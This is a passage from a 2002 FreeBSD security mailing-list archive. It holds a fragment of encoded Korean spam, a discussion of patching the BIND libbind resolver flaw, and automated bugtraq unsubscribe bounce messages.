bmRyYWdzdGFydD1ub0FjdGlvbg0KZG9jdW1lbnQub25zZWxlY3RzdGFydD1ub0FjdGlvbg0K Ly8tLT4NCjwvU0NSSVBUPg0KDQoNCg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBl IiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9ZXVjLWtyIj4NCjx0aXRsZT6/7LiuxKu1 5SAgPC90aXRsZT4NCg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSJ3aGl0ZSIgdGV4dD0i YmxhY2siIGxpbms9ImJsdWUiIHZsaW5rPSJwdXJwbGUiIGFsaW5rPSJyZWQiPg0KPHRhYmxl IGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgY2VsbHNwYWNpbmc9IjAiIHdpZHRoPSI1ODki IGhlaWdodD0iOTIiIGJvcmRlcmNvbG9yZGFyaz0id2hpdGUiIGJvcmRlcmNvbG9ybGlnaHQ9 ImJsYWNrIj4NCiAgICA8dHI+DQogICAgICAgIDx0ZCB3aWR0aD0iNTkyIiBjb2xzcGFuPSIy Ij4NCiAgICAgICAgICAgIDxwPjxpbWcgc3JjPSJodHRwOi8vd3d3Lml5ZXNjYXJkLmNvbS9p bWFnZS90b3BfNy5naWYiIHdpZHRoPSI1OTciIGhlaWdodD0iOTIiIGJvcmRlcj0iMCI+PC9w Pg0KICAgICAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAgICA8dGQgd2lk dGg9IjU5MiIgY29sc3Bhbj0iMiI+DQogICAgICAgICAgICA8cCBhbGlnbj0iY2VudGVyIj48 aW1nIHNyYz0iaHR0cDovL3d3dy5peWVzY2FyZC5jb20vaW1hZ2UvYm90dG9tNi5naWYiIHdp ZHRoPSI1OTciIGhlaWdodD0iMjExIiBib3JkZXI9IjAiPjwvcD4NCiAgICAgICAgPC90ZD4N CiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI1ODkiIGNvbHNwYW49 IjIiPg0KCQkJCQk8Zm9ybSBuYW1lPSJtYWlsZnJtIiBhY3Rpb249Imh0dHA6Ly93d3cuaXdv b3JpY2FyZC5jb20vbWFpbC9pbnNlcnQxLmFzcCIgbWV0aG9kPSJwb3N0IiA+CQ0KICAgICAg ICAgICAgPHAgYWxpZ249ImNlbnRlciIgc3R5bGU9InRleHQtaW5kZW50Oi0xOyBsaW5lLWhl aWdodDowOyBtYXJnaW46MDsiPjxmb250IHNpemU9IjIiIGNvbG9yPSIjNjY2NjY2Ij68urjt PC9mb250Pjxmb250IHNpemU9IjIiPiAgDQogICAgICAgICAgPC9mb250PjxpbnB1dCB0eXBl PSJ0ZXh0IiBuYW1lPSJuYW1lIiBzaXplPSI2Ij4NCgkJICAmbmJzcDs8Zm9udCBzaXplPSIy IiBjb2xvcj0iIzY2NjY2NiI+wda5zrXut88gufjIoyA8L2ZvbnQ+PGlucHV0IHR5cGU9InRl eHQiIG5hbWU9Imp1bWluIiBzaXplPSIxNCIgbWF4bGVuZ3RoPSIxNCI+DQogICAgICAgICAg PGJyPjxmb250IHNpemU9IjIiIGNvbG9yPSIjNjY2NjY2Ij7B98DlIMD8yK0gIA0KICAgICAg ICAgIDwvZm9udD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idGVsbnVtIiBzaXplPSIxMyI+ DQogICAgICAgICAgJm5ic3A7Jm5ic3A7Jm5ic3A7PGZvbnQgc2l6ZT0iMiIgY29sb3I9IiM2 NjY2NjYiPsjetOvG+SA8L2ZvbnQ+PGZvbnQgc2l6ZT0iMiI+PGlucHV0IHR5cGU9InRleHQi IG5hbWU9ImhhbmRudW0iIHNpemU9IjE1Ij4NCiAgICAgICAgICA8L2ZvbnQ+PGlucHV0IHR5 cGU9InN1Ym1pdCIgbmFtZT0iU3VibWl0MiIgdmFsdWU9Ir3Fw7siPiA8L2Zvcm0+DQoNCgkN CiAgICAgICAgPC90ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRo PSIyOTQiPg0KICAgICAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0dHA6 Ly93d3cuaXllc2NhcmQuY29tL2ltYWdlL2V2ZW50MS5naWYiIHdpZHRoPSIyOTQiIGhlaWdo dD0iMjAwIiBib3JkZXI9IjAiPjwvcD4NCiAgICAgICAgPC90ZD4NCiAgICAgICAgPHRkIHdp ZHRoPSIyOTQiPg0KICAgICAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0 dHA6Ly93d3cuaXllc2NhcmQuY29tL2ltYWdlL2V2ZW50Mi5naWYiIHdpZHRoPSIyOTQiIGhl aWdodD0iMjAwIiBib3JkZXI9IjAiPjwvcD4NCiAgICAgICAgPC90ZD4NCiAgICA8L3RyPg0K ICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI1OTIiIGNvbHNwYW49IjIiPg0KICAgICAg ICAgICAgPHAgYWxpZ249ImxlZnQiPiZuYnNwOzxmb250IHNpemU9IjIiIGZhY2U9IrG8uLIi IGNvbG9yPSIjNjY2NjY2Ij6xzcfPwMcgDQogICAgICAgICAgICC43sDPwda80rTCIMClvK3H zsC7IMXrx9ggvPbB/cfRILDNwMy45ywgsde/3L+hIL7utrDH0SDBpLq4tbUgsK6w7SANCiAg ICAgICAgICAgIMDWwfYgvsrAvcC7ILngyPy0z7TZLjxicj4gJm5ic3A7wMwgRS1tYWlswLog ud+9xcD8v+vAzLjnLCC/+MShIL7KwLi9xyANCiAgICAgICAgICAgILDmv+wgvsa3oSDDor+h ILjewM/B1rzSuKYgwNS3wsfPv6kgwda9w7jpILXOILn4ILTZvcMguN7AzyAmbmJzcDvAzCAN CiAgICAgICAgICAgILChwfYgvsq1tbfPIMfPsNq9wLTPtNkuPC9mb250PjwvcD4NCiAgICAg ICAgPC90ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI1ODki IGNvbHNwYW49IjIiPg0KICA8Zm9ybSBuYW1lPSJtYWlsZnJtMiIgYWN0aW9uPSJodHRwOi8v d3d3Lml3b29yaWNhcmQuY29tL21haWwvbm8uYXNwIiBtZXRob2Q9InBvc3QiID4gIAkgIA0K ICAgICAgICAgICAgICAgIDxwIGFsaWduPSJjZW50ZXIiIHN0eWxlPSJtYXJnaW4tbGVmdDow OyI+PGZvbnQgc2l6ZT0iMiIgY29sb3I9IiM2NjY2NjYiPrz2vcWwxbrOIA0KICAgICAgICAg ICAgICAgIC8gcmVmdXNhbCBvZiByZWNlaXB0PC9mb250PiANCiAgICAgICAgICA8aW5wdXQg dHlwZT0idGV4dCIgbmFtZT0iZW1haWwiIHNpemU9IjI1Ij4NCiAgICAgICAgICA8aW5wdXQg dHlwZT0ic3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJFTlRFUiI+PC9mb3JtPgkNCiAg ICAgICAgPC90ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI1 ODkiIGNvbHNwYW49IjIiPg0KCTxwIGFsaWduPSJjZW50ZXIiIHN0eWxlPSJ0ZXh0LWluZGVu dDotMTsgbWFyZ2luLXJpZ2h0OjA7IG1hcmdpbi1sZWZ0OjA7Ij48aW1nIHNyYz0iaHR0cDov L3d3dy5peWVzY2FyZC5jb20vaW1hZ2UvZjMuZ2lmIiB3aWR0aD0iNjAwIiBoZWlnaHQ9IjYw IiBib3JkZXI9IjAiIGFsaWduPSJtaWRkbGUiIHZzcGFjZT0iMCIgaHNwYWNlPSIwIj4gICAg ICAgIDwvdGQ+DQogICAgPC90cj4NCjwvdGFibGU+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJz cDs8L3A+DQo8L2JvZHk+DQoNCjwvaHRtbD4NCg0K ------=_NextPart_000_0117_01C0F35A.93A48C00-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19:42: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7633837B400 for ; Sun, 30 Jun 2002 19:42:05 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9C30843E0A for ; Sun, 30 Jun 2002 19:42:04 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id UAA07543; Sun, 30 Jun 2002 20:41:46 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020630203234.00c65d60@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 30 Jun 2002 20:37:52 -0600 To: Michael Han From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: security@FreeBSD.ORG In-Reply-To: <20020630190001.L31022@giles.mikehan.com> References: <4.3.2.7.2.20020629180311.02b5b2d0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> <3D1E2D22.EBCE8199@FreeBSD.org> <4.3.2.7.2.20020629180311.02b5b2d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:00 PM 6/30/2002, Michael Han wrote: >Brett, your postings suggest that you don't understand the nature of >the bug and libbind. libbind is an optional component which the vast >majority of FreeBSD users would not have installed on their systems. This is good. >Bind itself does not link to it in the default installation, and under >no circumstances is the Bind named server a vector for risk. Yes, that's what the CERT advisory said. >Only by installing the vulnerable libbind and linking software against it >(this would not be the default behavior of any normally >ported/portable software) can an installation of Bind introduce risk. That's what I'm concerned about. I want to make sure that I install a version that's not vulnerable, in case I do bring in something that links to it. ISC's description of the library suggests that it's useful and that apps do link to it. >libbind is a *replacement* library (or it's possible that it could >serve as the only implementation on a truly ancient and backwards >system) providing name service resolution to applications that need >that. Normally these services are gotten from the native C library, >libc. Which is another problem. I've got some machines dating back to FreeBSD 2.2.7 and 2.2.8 here, some of which I cannot just upgrade because they're running embedded systems or custom code. I've got to find a way to patch them. Hence the concern. The latest gaggle of bugs is so pervasive that it's difficult to create new machines in which one can be confident, much less patch the older ones. I really hope that there will be a 4.6.1. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19:42:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 28B6D37B400 for ; Sun, 30 Jun 2002 19:42:20 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6195043E09 for ; Sun, 30 Jun 2002 19:42:19 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id UAA07547; Sun, 30 Jun 2002 20:41:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020630203852.00c6d280@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 30 Jun 2002 20:40:27 -0600 To: Mark.Andrews@isc.org From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: Pete Ehlke , security@FreeBSD.ORG In-Reply-To: <200207010208.g6128hm0066820@drugs.dv.isc.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:08 PM 6/30/2002, Mark.Andrews@isc.org wrote: > You have been told how to fix the problem. Install libbind > from BIND 8 (that implies the include files). > > BIND9: > don't call configure with --enable-libbind (this is the default) > BIND8: > remove "bin" from "SUBDIRS= include port lib bin" in the top > level Makefile > > Install both BIND 8 and BIND 9. "--enable-libbind" effectively > does just that. I'll do this. It'll be a bunch of work to do it on several systems.... I wish there were up-to-date binary packages! I may try to create a binary package for BIND 8's libbind to make this easier. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 21:57: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DED8937B400 for ; Sun, 30 Jun 2002 21:56:53 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 359A043E13 for ; Sun, 30 Jun 2002 21:56:49 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 28502 invoked by alias); 1 Jul 2002 04:55:39 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 1 Jul 2002 04:55:39 -0000 Message-ID: <1025499339.28501.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 28496 invoked from network); 1 Jul 2002 04:55:39 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 1 Jul 2002 04:55:39 -0000 Received: (qmail 28926 invoked by alias); 1 Jul 2002 04:51:08 -0000 Received: (qmail 28922 invoked from network); 1 Jul 2002 04:51:06 -0000 Received: from big.innet.yaroslavl.su (217.15.134.73) by mail.securityfocus.com with SMTP; 1 Jul 2002 04:51:06 -0000 Received: from news.innet.yaroslavl.su (news.innet.yaroslavl.su [217.15.134.69]) by big.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA85645 for ; Mon, 1 Jul 2002 08:56:43 +0400 (MSD) Received: from mail.yartelecom.ru (mail.yartelecom.ru [10.5.255.3]) by news.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA98536 for ; Mon, 1 Jul 2002 08:56:43 +0400 (MSD) Received: (from root@localhost) by mail.yartelecom.ru (8.11.6/8.11.6) id g614uhG67427 for bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com; Mon, 1 Jul 2002 08:56:43 +0400 (MSD) Received: from itserv.it.yartelecom.ru (itserv.it.yartelecom.ru [10.3.8.144]) by mail.yartelecom.ru (8.11.6/8.11.6) with ESMTP id g614ugJ67413 for ; Mon, 1 Jul 2002 08:56:42 +0400 (MSD) Received: by itserv.it.yartelecom.ru (Postfix, from userid 100) id BEF34362; Mon, 1 Jul 2002 08:58:18 +0400 (MSD) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 28496 invoked from network); 1 Jul 2002 04:55:39 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 1 Jul 2002 04:55:39 -0000 Received: (qmail 28926 invoked by alias); 1 Jul 2002 04:51:08 -0000 Received: (qmail 28922 invoked from network); 1 Jul 2002 04:51:06 -0000 Received: from big.innet.yaroslavl.su (217.15.134.73) by mail.securityfocus.com with SMTP; 1 Jul 2002 04:51:06 -0000 Received: from news.innet.yaroslavl.su (news.innet.yaroslavl.su [217.15.134.69]) by big.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA85645 for ; Mon, 1 Jul 2002 08:56:43 +0400 (MSD) Received: from mail.yartelecom.ru (mail.yartelecom.ru [10.5.255.3]) by news.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA98536 for ; Mon, 1 Jul 2002 08:56:43 +0400 (MSD) Received: (from root@localhost) by mail.yartelecom.ru (8.11.6/8.11.6) id g614uhG67427 for bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com; Mon, 1 Jul 2002 08:56:43 +0400 (MSD) Received: from itserv.it.yartelecom.ru (itserv.it.yartelecom.ru [10.3.8.144]) by mail.yartelecom.ru (8.11.6/8.11.6) with ESMTP id g614ugJ67413 for ; Mon, 1 Jul 2002 08:56:42 +0400 (MSD) Received: by itserv.it.yartelecom.ru (Postfix, from userid 100) id BEF34362; Mon, 1 Jul 2002 08:58:18 +0400 (MSD) Date: Mon, 1 Jul 2002 08:58:18 +0400 From: "Alexander E. Syasin" To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com Message-ID: <20020701085818.D53713@it.yartelecom.ru> References: <1025322076.19222.ezmlm@securityfocus.com> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com>; from bugtraq-help@securityfocus.com on Sat, Jun 29, 2002 at 03:41:16AM -0000 On Sat, Jun 29, 2002 at 03:41:16AM -0000, bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > freebsd-security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 > Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 > Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 > Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 > Date: 29 Jun 2002 03:40:08 -0000 > Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > -- +> þÉÓÔÏÐÌÏÔÎÏÓÔØ, ÜÔÏ ÞÉÓÔÏ ÍÁÓÓÁ ÎÁ ÞÉÓÔÏ ÏÂßÅÍ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 22: 0:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7CEB037B400 for ; Sun, 30 Jun 2002 22:00:37 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id DFD6043E77 for ; Sun, 30 Jun 2002 21:58:10 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 28572 invoked by alias); 1 Jul 2002 04:56:50 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 1 Jul 2002 04:56:50 -0000 Message-ID: <1025499410.28571.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 28566 invoked from network); 1 Jul 2002 04:56:50 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 1 Jul 2002 04:56:50 -0000 Received: (qmail 29013 invoked by alias); 1 Jul 2002 04:52:19 -0000 Received: (qmail 29009 invoked from network); 1 Jul 2002 04:52:18 -0000 Received: from big.innet.yaroslavl.su (217.15.134.73) by mail.securityfocus.com with SMTP; 1 Jul 2002 04:52:18 -0000 Received: from news.innet.yaroslavl.su (news.innet.yaroslavl.su [217.15.134.69]) by big.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA85715 for ; Mon, 1 Jul 2002 08:57:56 +0400 (MSD) Received: from mail.yartelecom.ru (mail.yartelecom.ru [10.5.255.3]) by news.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA98628 for ; Mon, 1 Jul 2002 08:57:55 +0400 (MSD) Received: (from root@localhost) by mail.yartelecom.ru (8.11.6/8.11.6) id g614vtM68191 for bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com; Mon, 1 Jul 2002 08:57:55 +0400 (MSD) Received: from itserv.it.yartelecom.ru (itserv.it.yartelecom.ru [10.3.8.144]) by mail.yartelecom.ru (8.11.6/8.11.6) with ESMTP id g614vtJ68181 for ; Mon, 1 Jul 2002 08:57:55 +0400 (MSD) Received: by itserv.it.yartelecom.ru (Postfix, from userid 100) id B19CC362; Mon, 1 Jul 2002 08:59:31 +0400 (MSD) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 28566 invoked from network); 1 Jul 2002 04:56:50 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 1 Jul 2002 04:56:50 -0000 Received: (qmail 29013 invoked by alias); 1 Jul 2002 04:52:19 -0000 Received: (qmail 29009 invoked from network); 1 Jul 2002 04:52:18 -0000 Received: from big.innet.yaroslavl.su (217.15.134.73) by mail.securityfocus.com with SMTP; 1 Jul 2002 04:52:18 -0000 Received: from news.innet.yaroslavl.su (news.innet.yaroslavl.su [217.15.134.69]) by big.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA85715 for ; Mon, 1 Jul 2002 08:57:56 +0400 (MSD) Received: from mail.yartelecom.ru (mail.yartelecom.ru [10.5.255.3]) by news.innet.yaroslavl.su (8.9.3/8.9.3) with ESMTP id IAA98628 for ; Mon, 1 Jul 2002 08:57:55 +0400 (MSD) Received: (from root@localhost) by mail.yartelecom.ru (8.11.6/8.11.6) id g614vtM68191 for bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com; Mon, 1 Jul 2002 08:57:55 +0400 (MSD) Received: from itserv.it.yartelecom.ru (itserv.it.yartelecom.ru [10.3.8.144]) by mail.yartelecom.ru (8.11.6/8.11.6) with ESMTP id g614vtJ68181 for ; Mon, 1 Jul 2002 08:57:55 +0400 (MSD) Received: by itserv.it.yartelecom.ru (Postfix, from userid 100) id B19CC362; Mon, 1 Jul 2002 08:59:31 +0400 (MSD) Date: Mon, 1 Jul 2002 08:59:31 +0400 From: "Alexander E. Syasin" To: bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com Message-ID: <20020701085931.G53713@it.yartelecom.ru> References: <1025372817.18079.ezmlm@securityfocus.com> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <1025372817.18079.ezmlm@securityfocus.com>; from bugtraq-help@securityfocus.com on Sat, Jun 29, 2002 at 05:46:57PM -0000 On Sat, Jun 29, 2002 at 05:46:57PM -0000, bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of 